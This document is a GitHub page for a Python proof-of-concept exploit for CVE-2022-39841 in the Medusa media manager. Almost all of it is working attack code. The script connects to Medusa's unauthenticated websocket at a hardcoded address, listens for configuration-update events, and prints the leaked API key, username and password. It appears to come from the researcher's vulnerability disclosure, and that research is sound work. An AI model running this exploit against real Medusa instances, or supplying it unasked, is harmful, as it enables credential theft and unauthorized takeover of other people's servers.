-
Notifications
You must be signed in to change notification settings - Fork 0
/
medusa_websocket_leak.py
53 lines (40 loc) · 1.43 KB
/
medusa_websocket_leak.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# Copyright (C) 2022 Mat Rollings
# https://github.com/stealthcopter/CVE-2022-39841
import json
import websocket
"""
This PoC script can point at an instance of Medusa that is password protected and
it will connect to the unauthenticated websocket it is running and wait for the
configuration to be changed and then leak the username/password.
"""
IP = '192.168.1.237'
PORT = 8083
WEBROOT = '/'
def on_message(ws, message):
obj = json.loads(message)
event = obj.get('event')
data = obj.get('data')
if event == 'configUpdated':
section = data.get('section')
config = data.get('config')
if config:
webinterface = config.get('webInterface', {})
apiKey = webinterface.get('apiKey')
username = webinterface.get('username')
password = webinterface.get('password')
print(f'{apiKey} {username} {password}')
ws.close()
def on_error(ws, error):
print(error)
def on_close(ws, close_status_code, close_msg):
print("### closed ###")
def on_open(ws):
print("### Opened connection ###")
print(f"ws://{IP}:{PORT}{WEBROOT}ws/ui")
websocket.enableTrace(True)
ws = websocket.WebSocketApp(f"ws://{IP}:{PORT}{WEBROOT}ws/ui",
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close)
ws.run_forever(ping_interval=60)